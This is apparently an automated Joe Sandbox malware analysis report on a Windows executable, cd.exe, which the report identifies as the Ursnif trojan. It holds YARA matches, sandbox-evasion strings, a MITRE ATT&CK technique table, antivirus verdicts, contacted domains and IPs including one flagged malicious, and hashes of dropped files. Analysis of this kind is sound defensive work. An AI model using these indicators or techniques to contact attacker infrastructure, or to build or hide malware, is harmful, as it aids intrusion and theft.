              Source: C:\Users\user\Desktop\cd.exe Unpacked PE file: 1.2.cd.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;aZAqrnJo:R;BGOllIzc:R;yQtoRARz:R;dZLJZOuu:R;sdDGHbsk:R;cQfsAIeK:R;nJjdtQIB:R;pcHOcQzM:R;wDcvvqlu:R;orXBiygL:R;AiZKCfrK:R;myoGvTPf:R;AVTlzkED:R;bzLENpIH:R;XcYnViEt:R;mbKhPZXg:R;lUpFJlcq:R;yiDSdvAK:R;tWLpgAgw:R;bTGdVUjl:R;ziIDaoXi:R;LzawvTwX:R;LnIDzdzd:R;wkCXpCGo:R;nqpeKqho:R;MRjgEOqy:R;JcLmCXgA:R;OtycdIdu:R;IbVOTdPC:R;FgFHDyjf:R;ybeqBvHg:R;IbzUQYJs:R;AQBgSYnS:R;XxFUmGWX:R;afVQQtfj:R;nwvMTysA:R;ZHPQhgLD:R;pxMMJkwk:R;JXHCNYcJ:R;lYRopDTG:R;bcYTpMaT:R;nuBezWiu:R;yPvpmSBg:R;OoEfGgTM:R;kYRGCWEC:R;ssiFbfZW:R;KHKSQqok:R;NcZcjaDP:R;mIUEylgT:R;lluFjCpP:R;BHqNuAAF:R;dWFkhiaJ:R;NeKPPFmp:R;mRaJxCpw:R;sjZRApAc:R;mJuapRBt:R;AUQwTDRB:R;Mzpcxreq:R;DQLewjlc:R;yQzDovRx:R;KsasGyWE:R;qALhWEsZ:R;EhLKChYp:R;juiuAwmE:R;FPCcnPuO:R;DQPOFovS:R;eeLebknr:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_0040322B push ecx; ret 1_2_0040323B
              Source: initial sample Static PE information: section name: .text entropy: 6.93749374769

              Hooking and other Techniques for Hiding and Protection:

              Yara detected Ursnif
              Source: Yara match File source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR
              Source: C:\Users\user\Desktop\cd.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: cd.exe Binary or memory string: IIRP_MJ_FASTIO_PROCMON.EXEPROCEXP.EXEAUTORUNS.EXESYSTEMPAGEFILE.SYS$MFT$MFTMIRR$LOGFILE$VOLUME$ATTRDEF$ROOT$BITMAP$BOOT$BADCLUS$SECURE$UPCASE$EXTENDFAST IOINCLUDEEXCLUDE<BAD>OKAY TO OVERWRITE EVENT LOG ''?AN ERROR OCCURRED OPENING THE SNAPSHOT ''APPLYING EVENT FILTEROPERATION CANCELLED: THE LISTVIEW DATA MAY BE INCOMPLETEPROCESS MONITOR CAN OPEN AT MOST BACKING FILES<PAGEFILE>YESNOEVENTPROCESSINDEXSTACKFRAMEDEPTHADDRESS + PATHLOCATIONPROCESSPROCESSIDPARENTPROCESSIDPARENTPROCESSINDEXAUTHENTICATIONIDCREATETIMEFINISHTIMEISVIRTUALIZEDIS64BITINTEGRITYOWNERPROCESSNAMECOMMANDLINECOMPANYNAMEVERSIONDESCRIPTIONMODULELISTMODULETIMESTAMPBASEADDRESSSIZECOMPANYPROCESS MONITOR - EXPORTING EVENT DATAWT, CCS=UTF-8"%S"
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_004359CA mov eax, dword ptr fs:[00000030h] 1_2_004359CA
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_0043559C push dword ptr fs:[00000030h] 1_2_0043559C
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_008004F4 mov eax, dword ptr fs:[00000030h] 1_2_008004F4
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_008000C6 push dword ptr fs:[00000030h] 1_2_008000C6
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_00401873 GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,NtGetContextThread,NtGetContextThread,LdrInitializeThunk, 1_2_00401873
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_00402F32 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError, 1_2_00402F32
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_00401342 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 1_2_00401342

              Stealing of Sensitive Information:

              Yara detected Ursnif

              Remote Access Functionality:

              Yara detected Ursnif
              Source: Yara match File source: cd.exe, type: SAMPLE

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Windows Management Instrumentation2 | Path Interception | Process Injection2 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Command and Scripting Interpreter2 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection2 | LSASS Memory | Process Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | Service Execution1 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information2 | Security Account Manager | File and Directory Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing23 | NTDS | System Information Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol4 | SIM Card Swap |  | Carrier Billing Fraud

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label | Link
              cd.exe | 60% | ReversingLabs | Win32.Trojan.Ursnif |
              cd.exe | 100% | Joe Sandbox ML | |

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              Source | Detection | Scanner | Label | Link
              1.2.cd.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8 |
              1.3.cd.exe.82998c.0.unpack | 100% | Avira | TR/Patched.Ren.Gen |

              Domains

              No Antivirus matches


              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              google.com | 142.250.203.110 | true | false | | high
              menehleibe.com | 173.239.8.164 | true | true | | unknown
              www.google.com | 142.250.102.106 | true | false | | high
              mybetterdl.com | 173.192.101.24 | true | false | | unknown
              gertrk.com | 168.119.139.96 | true | false | | unknown
              p226681.mybetterdl.com | 173.192.101.24 | true | false | | unknown


                                      URLs from Memory and Binaries


                                                                                                                                                                      Contacted IPs


                                                                                                                                                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
173.192.101.24 | mybetterdl.com | United States | 36351 | SOFTLAYERUS | false
173.239.8.164 | menehleibe.com | United States | 27257 | WEBAIR-INTERNETUS | true
142.250.102.106 | www.google.com | United States | 15169 | GOOGLEUS | false
142.250.203.110 | google.com | United States | 15169 | GOOGLEUS | false
168.119.139.96 | gertrk.com | Germany | 24940 | HETZNER-ASDE | false

                                                                                                                                                                      General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 483177
Start date: 14.09.2021
Start time: 16:01:46
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 10s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: cd.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.spre.troj.evad.winEXE@4/27@6/5
                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                      HDC Information:
                                                                                                                                                                      • Successful, ratio: 46.1% (good quality ratio 43.4%)
                                                                                                                                                                      • Quality average: 71.3%
                                                                                                                                                                      • Quality standard deviation: 30.3%
                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                      Warnings:
                                                                                                                                                                      Show All
                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 23.203.80.193, 172.217.168.67, 20.54.110.249, 40.112.88.60, 152.199.19.161, 20.50.102.62, 80.67.82.235, 80.67.82.211, 23.211.4.86
                                                                                                                                                                      • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, www.gstatic.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ie9comview.vo.msecnd.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/483177/sample/cd.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs


Domains


ASN

                                                                                                                                                                      Kp6SDRr8xdGet hashmaliciousBrowse
                                                                                                                                                                      • 173.193.175.220
                                                                                                                                                                      BqfM9JwIC5Get hashmaliciousBrowse
                                                                                                                                                                      • 161.159.29.133
                                                                                                                                                                      O83wubYGMU.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 216.250.97.121
                                                                                                                                                                      OnRFDWqdnFGet hashmaliciousBrowse
                                                                                                                                                                      • 150.239.179.11
                                                                                                                                                                      2vMBHaZcM5Get hashmaliciousBrowse
                                                                                                                                                                      • 174.122.77.118
                                                                                                                                                                      iYUfv1bE48Get hashmaliciousBrowse
                                                                                                                                                                      • 169.62.46.57
                                                                                                                                                                      sora.arm7Get hashmaliciousBrowse
                                                                                                                                                                      • 74.54.2.125
                                                                                                                                                                      OffboardDiagLauncher.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 150.238.42.13

                                                                                                                                                                      JA3 Fingerprints


                                                                                                                                                                      Dropped Files

                                                                                                                                                                      No context

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F14FAF2F-15AF-11EC-90E5-ECF4BB2D2496}.dat
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):29272
                                                                                                                                                                      Entropy (8bit):1.7680750665735105
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:IwLGcpryGwpL3G/ap8JGIpcaQGvnZpva1GoHRqp9aGGo4zX1pmNGWHz71MGWHBTw:rRZ6Z/27WGt2AfszX1MHPCIifT9cDB
                                                                                                                                                                      MD5:6718428E930008E34240856F43C47A5E
                                                                                                                                                                      SHA1:7D88F1553C8394FB762C236D1AD3B9193D877F84
                                                                                                                                                                      SHA-256:57819E6BE034067D0BA3C30AB272050D20D41CCE457DA3444171DC64E155FCD1
                                                                                                                                                                      SHA-512:D6371F4BD026975901D47B6851D1ED69EB43FB42FF5BD6CE422D4E768337CBD2E41FDA0454D68C4FF37E7D6CBC95F7E57E9AE396AECC06D747E3327A629A6766
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):33596
                                                                                                                                                                      Entropy (8bit):1.7318997073805276
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:rOZRQh6TkMjR29W+MaguzrMg2oyEcdOy8Og:ram8Y+AUXXYQ+//
                                                                                                                                                                      MD5:30628B54E4C2F4AABCD1C1C35E73BA0E
                                                                                                                                                                      SHA1:894C3CABAB8EC9C63069758EE70965C511A5A10C
                                                                                                                                                                      SHA-256:6B8FFAC8A720BD8D337017290A85B5ADEAD8AF2B0FE9B204313462235096CB5A
                                                                                                                                                                      SHA-512:91628C946C5395DB58586ECBF60E0F06BC8B7081475D47F251C5F2B5E5884A820DB7D93BEFBAE2DEF971C873E4BBAF26962FFE7175B6216100756E8E1BCFA6E6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):659
                                                                                                                                                                      Entropy (8bit):5.103204027570093
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):656
                                                                                                                                                                      Entropy (8bit):5.060030324837212
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xc98e1a9d,0x01d7a9bc</date><accdate>0xc98e1a9d,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xc98e1a9d,0x01d7a9bc</date><accdate>0xc98e1a9d,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):665
                                                                                                                                                                      Entropy (8bit):5.122450678810792
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):650
                                                                                                                                                                      Entropy (8bit):5.118921291916546
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):659
                                                                                                                                                                      Entropy (8bit):5.1343683532362645
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):656
                                                                                                                                                                      Entropy (8bit):5.107052953253313
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):659
                                                                                                                                                                      Entropy (8bit):5.143005129532291
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):662
                                                                                                                                                                      Entropy (8bit):5.119025965656811
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):656
                                                                                                                                                                      Entropy (8bit):5.104263951080776
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\wlm7n14\imagestore.dat
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5736
                                                                                                                                                                      Entropy (8bit):3.203464048321813
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:dparxe4e4e4e4e4e4f4f4f4f4f4f4f4fYfYfYfYfYeYeYCYCHHHH222w:ci
                                                                                                                                                                      MD5:11D51B96EA77F30B330194110BA96BC7
                                                                                                                                                                      SHA1:CEA4D42916C32FC21A2C60620DE8F76A2DBC4426
                                                                                                                                                                      SHA-256:79FC13392629FF36B061CD9BD12D6152B300953BC272F6CEAAAA2A2B25B7A005
                                                                                                                                                                      SHA-512:2FE562F5713C6C01A91DFC3E3A962B1C9F8A15033DE73E39E8E9C0DC17397A07361CCDF5170842B0EDE687AD48289C4F191D07D72A08E30257ABD9FFE71C2A9E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: https://gertrk.com/favicon.ico
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\0V71R0V5.htm
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):219
                                                                                                                                                                      Entropy (8bit):5.23823323380098
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:IskN20EFNjJ8S/7A+KWRIJiYEUFLZxs4bSl02rBsSZ7NE7uR0Lq9DmJS4IoQ5a8G:wRkrQWR0iYBtqWt2aSyuic4ILoP
                                                                                                                                                                      MD5:D4B691CD9D99117B2EA34586D3E7EEB8
                                                                                                                                                                      SHA1:C79F5572F672361BC097676CB5DA9D4AA956C8B9
                                                                                                                                                                      SHA-256:2178EEDD5723A6AC22E94EC59BDCD99229C87F3623753F5E199678242F0E90DE
                                                                                                                                                                      SHA-512:B69C162BFBA1290C98A2CD222F6EFF9DF69CFC3DBA1651381F4068B30DA813E1687387A794E50B51058C2FDA17B217153BA9599E1E19DC567389B7083093C1FD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>301 Moved</TITLE></HEAD><BODY>.<H1>301 Moved</H1>.The document has moved.<A HREF="http://www.google.com/">here</A>...</BODY></HTML>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\d4a6d4bd[1].htm
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1655
                                                                                                                                                                      Entropy (8bit):6.062272980018994
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:9TQ3GC2lAeIRjHpPQWhLB0yQkcz8uhTMeD3Uenvj:pQUOXNHpPQWJB0yQjQuhAm3Ueb
                                                                                                                                                                      MD5:5DB7C38AA6E80C00473D801F6610B35F
                                                                                                                                                                      SHA1:54DAB73B9A850665843529118E72AC0A5DAA55A1
                                                                                                                                                                      SHA-256:CC334F770DC2A3CD8B1AC2D64E035A71DDF8855C5B68F2DE884D11C7F8EC98E6
                                                                                                                                                                      SHA-512:E299B27F4E09EB08C9F800D54B27548738B9D74A33EFA8A460C488268EB6249CB1F8F932147411F541CF5A3B072BA503BE74A69E2A635AF671474352ED869585
                                                                                                                                                                      Malicious:false
